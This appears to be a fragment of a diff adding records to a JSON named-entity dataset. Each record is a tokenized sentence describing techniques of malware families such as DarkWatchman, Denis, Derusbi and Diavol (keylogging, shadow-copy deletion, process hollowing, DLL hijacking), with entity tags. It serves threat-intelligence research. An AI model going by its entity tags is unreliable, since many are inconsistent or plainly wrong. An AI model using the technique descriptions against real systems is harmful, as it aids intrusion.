"O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "can", + "use", + "WMI", + "queries", + "to", + "obtain", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkTortilla", + "has", + "established", + "persistence", + "via", + "the", + "`Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon`", + "registry", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "reports", + "window", + "names", + "along", + "with", + "keylogger", + "information", + "to", + "provide", + "application", + "context." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "use", + "TLS", + "to", + "encrypt", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "retrieve", + "browser", + "history." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "used", + "Base64", + "to", + "encode", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "used", + "the", + "<code>csc.exe</code>", + "tool", + "to", + "compile", + "a", + "C#", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "collect", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "the", + "ability", + "to", + "self-extract", + "as", + "a", + "RAR", + "archive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "used", + "a", + "DGA", + "to", + "generate", + "a", + "domain", + "name", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "been", + "delivered", + "as", + "compressed", + "RAR", + "payloads", + "in", + "ZIP", + "files", + "to", + "victims." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "been", + "observed", + "deleting", + "its", + "original", + "launcher", + "after", + "installation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "the", + "ability", + "to", + "enumerate", + "file", + "and", + "folder", + "names." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "store", + "configuration", + "strings,", + "keylogger,", + "and", + "output", + "of", + "components", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "uninstall", + "malicious", + "components", + "from", + "the", + "Registry,", + "stop", + "processes,", + "and", + "clear", + "the", + "browser", + "history." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "delete", + "shadow", + "volumes", + "using", + "<code>vssadmin.exe</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkWatchman", + "uses", + "JavaScript", + "to", + "perform", + "its", + "core", + "functionalities." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "track", + "key", + "presses", + "with", + "a", + "keylogger", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "stage", + "local", + "data", + "in", + "the", + "Windows", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "used", + "an", + "icon", + "mimicking", + "a", + "text", + "file", + "to", + "mask", + "a", + "malicious", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "modify", + "Registry", + "values", + "to", + "store", + "configuration", + "strings,", + "keylogger,", + "and", + "output", + "of", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "list", + "signed", + "PnP", + "drivers", + "for", + "smartcard", + "readers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "execute", + "PowerShell", + "commands", + "and", + "has", + "used", + "PowerShell", + "to", + "execute", + "a", + "keylogger." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "query", + "the", + "Registry", + "to", + "determine", + "if", + "it", + "has", + "already", + "been", + "installed", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "created", + "a", + "scheduled", + "task", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "search", + "for", + "anti-virus", + "products", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "load", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "been", + "delivered", + "via", + "spearphishing", + "emails", + "that", + "contain", + "a", + "malicious", + "zip", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkWatchman", + "encodes", + "data", + "using", + "hexadecimal", + "representation", + "before", + "sending", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "collect", + "the", + "OS", + "version,", + "system", + "architecture,", + "and", + "computer", + "name." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "identity", + "the", + "OS", + "locale", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "has", + "collected", + "the", + "username", + "from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "collect", + "time", + "zone", + "information", + "and", + "system", + "`UPTIME`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DarkWatchman", + "uses", + "HTTPS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkWatchman", + "can", + "use", + "WMI", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "hides", + "collected", + "data", + "in", + "password-protected", + ".rar", + "archives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "hides", + "collected", + "data", + "in", + "password-protected", + ".rar", + "archives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Daserf", + "samples", + "were", + "signed", + "with", + "a", + "stolen", + "digital", + "certificate." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Analysis", + "of", + "Daserf", + "has", + "shown", + "that", + "it", + "regularly", + "undergoes", + "technical", + "improvements", + "to", + "evade", + "anti-virus", + "detection." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "can", + "download", + "remote", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "can", + "log", + "keystrokes." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Daserf", + "leverages", + "Mimikatz", + "and", + "Windows", + "Credential", + "Editor", + "to", + "steal", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "I-Tool", + "B-SecTeam", + "B-Tool", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "uses", + "file", + "and", + "folder", + "names", + "related", + "to", + "legitimate", + "programs", + "in", + "order", + "to", + "blend", + "in,", + "such", + "as", + "HP,", + "Intel,", + "Adobe,", + "and", + "perflogs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Tool", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Daserf", + "uses", + "encrypted", + "Windows", + "APIs", + "and", + "also", + "encrypts", + "data", + "using", + "the", + "alternative", + "base64+RC4", + "or", + "the", + "Caesar", + "cipher." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "can", + "take", + "screenshots." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "A", + "version", + "of", + "Daserf", + "uses", + "the", + "MPRESS", + "packer." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Daserf", + "uses", + "custom", + "base64", + "encoding", + "to", + "obfuscate", + "HTTP", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "can", + "use", + "steganography", + "to", + "hide", + "malicious", + "code", + "downloaded", + "to", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "uses", + "RC4", + "encryption", + "to", + "obfuscate", + "HTTP", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Daserf", + "can", + "execute", + "shell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DealersChoice", + "leverages", + "vulnerable", + "versions", + "of", + "Flash", + "to", + "perform", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DealersChoice", + "uses", + "HTTP", + "for", + "communication", + "with", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DealersChoice", + "makes", + "modifications", + "to", + "open-source", + "scripts", + "from", + "GitHub", + "and", + "executes", + "them", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "compressed", + "collected", + "data", + "using", + "zlib." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Denis", + "has", + "encoded", + "its", + "PowerShell", + "commands", + "in", + "Base64." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "exploits", + "a", + "security", + "vulnerability", + "to", + "load", + "a", + "fake", + "DLL", + "and", + "execute", + "its", + "code." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "has", + "used", + "DNS", + "tunneling", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "will", + "decrypt", + "important", + "strings", + "used", + "for", + "C&C", + "communication." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "has", + "a", + "command", + "to", + "delete", + "files", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "has", + "several", + "commands", + "to", + "search", + "directories", + "for", + "files." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "replaces", + "the", + "nonexistent", + "Windows", + "DLL", + "\"msfte.dll\"", + "with", + "its", + "own", + "malicious", + "version,", + "which", + "is", + "loaded", + "by", + "the", + "SearchIndexer.exe", + "and", + "SearchProtocolHost.exe." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Denis", + "deploys", + "additional", + "backdoors", + "and", + "hacking", + "tools", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "used", + "the", + "<code>IsDebuggerPresent</code>,", + "<code>OutputDebugString</code>,", + "and", + "<code>SetLastError</code>", + "APIs", + "to", + "avoid", + "debugging.", + "Denis", + "used", + "<code>GetProcAddress</code>", + "and", + "<code>LoadLibrary</code>", + "to", + "dynamically", + "resolve", + "APIs.", + "Denis", + "also", + "used", + "the", + "<code>Wow64SetThreadContext</code>", + "API", + "as", + "part", + "of", + "a", + "process", + "hollowing", + "process." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "obfuscates", + "its", + "code", + "and", + "encrypts", + "the", + "API", + "names." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "has", + "a", + "version", + "written", + "in", + "PowerShell." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "performed", + "process", + "hollowing", + "through", + "the", + "API", + "calls", + "CreateRemoteThread,", + "ResumeThread,", + "and", + "Wow64SetThreadContext." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Denis", + "queries", + "the", + "Registry", + "for", + "keys", + "and", + "values." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "encodes", + "the", + "data", + "sent", + "to", + "the", + "server", + "in", + "Base64." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "ran", + "multiple", + "system", + "checks,", + "looking", + "for", + "processor", + "and", + "register", + "characteristics,", + "to", + "evade", + "emulation", + "and", + "analysis." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "collects", + "OS", + "information", + "and", + "the", + "computer", + "name", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "uses", + "<code>ipconfig</code>", + "to", + "gather", + "the", + "IP", + "address", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "enumerates", + "and", + "collects", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Denis", + "can", + "launch", + "a", + "remote", + "shell", + "to", + "execute", + "arbitrary", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "is", + "capable", + "of", + "performing", + "audio", + "captures." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "injects", + "itself", + "into", + "the", + "secure", + "shell", + "(SSH)", + "process." + ], + "ner_tags": [ + "B-Way", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "uses", + "a", + "backup", + "communication", + "method", + "with", + "an", + "HTTP", + "beacon." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "is", + "capable", + "of", + "deleting", + "files.", + "It", + "has", + "been", + "observed", + "loading", + "a", + "Linux", + "Kernel", + "Module", + "(LKM)", + "and", + "then", + "deleting", + "it", + "from", + "the", + "hard", + "disk", + "as", + "well", + "as", + "overwriting", + "the", + "data", + "with", + "null", + "bytes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "is", + "capable", + "of", + "obtaining", + "directory,", + "file,", + "and", + "drive", + "listings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Derusbi", + "is", + "capable", + "of", + "logging", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Derusbi", + "binds", + "to", + "a", + "raw", + "socket", + "on", + "a", + "random", + "source", + "port", + "between", + "31800", + "and", + "31900", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "has", + "used", + "unencrypted", + "HTTP", + "on", + "port", + "443", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "collects", + "current", + "and", + "parent", + "process", + "IDs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "is", + "capable", + "of", + "enumerating", + "Registry", + "keys", + "and", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "variants", + "have", + "been", + "seen", + "that", + "use", + "Registry", + "persistence", + "to", + "proxy", + "execution", + "through", + "regsvr32.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Derusbi", + "is", + "capable", + "of", + "performing", + "screen", + "captures." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "obfuscates", + "C2", + "traffic", + "with", + "variable", + "4-byte", + "XOR", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "gathers", + "the", + "name", + "of", + "the", + "local", + "host,", + "version", + "of", + "GNU", + "Compiler", + "Collection", + "(GCC),", + "and", + "the", + "system", + "information", + "about", + "the", + "CPU,", + "machine,", + "and", + "operating", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Linux", + "version", + "of", + "Derusbi", + "checks", + "if", + "the", + "victim", + "user", + "ID", + "is", + "anything", + "other", + "than", + "zero", + "(normally", + "used", + "for", + "root),", + "and", + "the", + "malware", + "will", + "not", + "execute", + "if", + "it", + "does", + "not", + "have", + "root", + "privileges.", + "Derusbi", + "also", + "gathers", + "the", + "username", + "of", + "the", + "victim." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Derusbi", + "malware", + "supports", + "timestomping." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Derusbi", + "is", + "capable", + "of", + "creating", + "a", + "remote", + "Bash", + "shell", + "and", + "executing", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Derusbi", + "is", + "capable", + "of", + "capturing", + "video." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "delete", + "specified", + "files", + "from", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "has", + "encrypted", + "files", + "using", + "an", + "RSA", + "key", + "though", + "the", + "`CryptEncrypt`", + "API", + "and", + "has", + "appended", + "filenames", + "with", + "\".lock64\"." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "attempt", + "to", + "stop", + "security", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "has", + "a", + "command", + "to", + "traverse", + "the", + "files", + "and", + "directories", + "in", + "a", + "given", + "path." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "receive", + "configuration", + "updates", + "and", + "additional", + "payloads", + "including", + "wscpy.exe", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "can", + "delete", + "shadow", + "copies", + "using", + "the", + "`IVssBackupComponents`", + "COM", + "object", + "to", + "call", + "the", + "`DeleteSnapshots`", + "method." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "encryption,", + "Diavol", + "will", + "capture", + "the", + "desktop", + "background", + "window,", + "set", + "the", + "background", + "color", + "to", + "black,", + "and", + "change", + "the", + "desktop", + "wallpaper", + "to", + "a", + "newly", + "created", + "bitmap", + "image", + "with", + "the", + "text", + "“All", + "your", + "files", + "are", + "encrypted!", + "For", + "more", + "information", + "see", + "“README-FOR-DECRYPT.txt\"." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Diavol", + "has", + "used", + "several", + "API", + "calls", + "like", + "`GetLogicalDriveStrings`,", + "`SleepEx`,", + "`SystemParametersInfoAPI`,", + "`CryptEncrypt`,", + "and", + "others", + "to", + "execute", + "parts", + "of", + "its", + "attack." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "has", + "a", + "`ENMDSKS`", + "command", + "to", + "enumerates", + "available", + "network", + "shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "has", + "Base64", + "encoded", + "the", + "RSA", + "public", + "key", + "used", + "for", + "encrypting", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Diavol", + "has", + "used", + "`CreateToolhelp32Snapshot`,", + "`Process32First`,", + "and", + "`Process32Next`", + "API", + "calls", + "to", + "enumerate", + "the", + "running", + "processes", + "in", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + 